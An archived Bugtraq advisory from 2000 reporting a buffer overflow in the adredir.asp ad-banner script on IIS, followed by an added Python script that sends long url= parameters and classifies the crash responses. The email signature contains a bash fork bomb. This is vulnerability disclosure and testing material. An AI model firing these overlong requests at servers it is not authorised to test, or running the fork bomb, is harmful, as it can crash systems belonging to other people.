Bugtraq mailing list archives
Microsoft BackOffice component: adredir.asp
From: lcamtuf () TPI PL (Michal Zalewski)
Date: Sat, 3 Jun 2000 14:00:16 +0200
Bkgrnd: adredir.asp is a commonly used component of IIS-based commercial sites, used to handle ad banners. Altavista dumps a pretty impressive list of sites using it. Usually, this script lives in a subdirectory on the main IIS server, or on a dedicated ad server - you could easily obtain its location by inspecting banner code... adredir.asp is often renamed to 'redirect.asp' or so, but is quite popular.

This BO component (the first and only I'm going to check - responsible web admins shouldn't use IIS+ASP at all, choosing more secure solutions, like Apache+SSI or even Apache+IIS, IMHO) has a buffer overflow. It can be exploited by sending a request like:

GET /place_it_lives_in/adredir.asp?url=(more than +/- 500 bytes)

By choosing something around 500-510 bytes (depending on directory name length), you'll notice the first change - the server will drop the connection after returning the '302 Moved' HTTP header. Normally, it prints these headers, and then some HTML code as well:

<body><h1>Object Moved</h1>This object may be found <a HREF="AAAA....

Probably this HTML is rendered into a small text buffer, and the script crashes while trying to assemble it. With approx. 1000 bytes of junk, the script will die without even displaying headers. Funny. And exploitable, I guess. I have no idea about symptoms on the NT machine, probably not much, at least it does not crash (wow, uncommon!).

Have a good day. Someone might want to check if I'm right, but I can't imagine it might be something else than an overflow.

Btw. OAS (Oracle Application Server) / OWL (Oracle Web Listener) users shouldn't feel safe. More details soon.

Standard disclaimer applies. Yeah, yeah.

Hi to: b0f, lam3rz, HERT, teso and other people.

_______________________________________________________
Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
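The post describes a length-dependent failure mode: a normal 302 with an "Object Moved" body at short lengths, headers with the connection dropped before the body at roughly 500 bytes, and no status line at all at roughly 1000 bytes. The following is an added example (not Zalewski's code, and not part of the original post) that sends the request shape he gives over a range of url= lengths and classifies each reply into those three behaviours, so the transition points can be located on a test host you own. The host, port and path are assumptions; the sample replies in `demo_offline()` are constructed from the fragments quoted in the post.

```python
"""Length sweep for the adredir.asp behaviour described in the post.

Added example. HOST, PORT and PATH are assumptions; the post says the
script is often in a subdirectory or renamed (e.g. redirect.asp).
"""
import socket

HOST = "ads.example.invalid"   # assumption: replace with a host you own
PORT = 80
PATH = "/ads/adredir.asp"      # assumption: directory name affects the threshold


def build_request(path: str, host: str, length: int) -> bytes:
    """GET request whose url= parameter is `length` filler bytes, as in the post."""
    filler = "A" * length
    return (
        f"GET {path}?url={filler} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def classify_response(raw: bytes) -> str:
    """Map a raw reply to the behaviours the post describes.

    'normal'       - 302 status, headers, and the Object Moved HTML body
    'headers_only' - 302 status line but connection closed without the body
    'no_response'  - connection closed without any status line
    'other'        - some non-302 status (not one of the post's cases)
    """
    if not raw.startswith(b"HTTP/"):
        return "no_response"
    head, sep, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    if b"302" not in status_line:
        return "other"
    if sep and b"Object Moved" in body:
        return "normal"
    return "headers_only"


def probe(host: str, port: int, path: str, length: int, timeout: float = 5.0) -> str:
    """Send one request and return the classification of whatever came back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(path, host, length))
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # a hung script is reported from whatever was received
    return classify_response(b"".join(chunks))


def sweep(host: str, port: int, path: str,
          lengths=(100, 480, 500, 510, 600, 1000)) -> dict:
    """Probe each length from the post and return {length: verdict}."""
    return {n: probe(host, port, path, n) for n in lengths}


def demo_offline() -> dict:
    """Classify constructed replies (built from the fragments quoted in the post)."""
    samples = {
        "short": (b"HTTP/1.1 302 Object Moved\r\nLocation: http://example.invalid/\r\n\r\n"
                  b"<body><h1>Object Moved</h1>This object may be found "
                  b"<a HREF=\"AAAA\">here</a>.</body>"),
        "around_500": b"HTTP/1.1 302 Object Moved\r\nLocation: http://example.invalid/\r\n\r\n",
        "around_1000": b"",
    }
    return {name: classify_response(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, verdict in demo_offline().items():
        print(f"{name:12s} -> {verdict}")
    # Against a live host you control:
    # for n, verdict in sweep(HOST, PORT, PATH).items():
    #     print(f"{n:5d} bytes -> {verdict}")
```

Run `demo_offline()` to see the three classes without touching a network; `sweep()` only makes sense against a host you are authorised to test, and the lengths should be adjusted for the directory name, since the post notes the threshold moves with it.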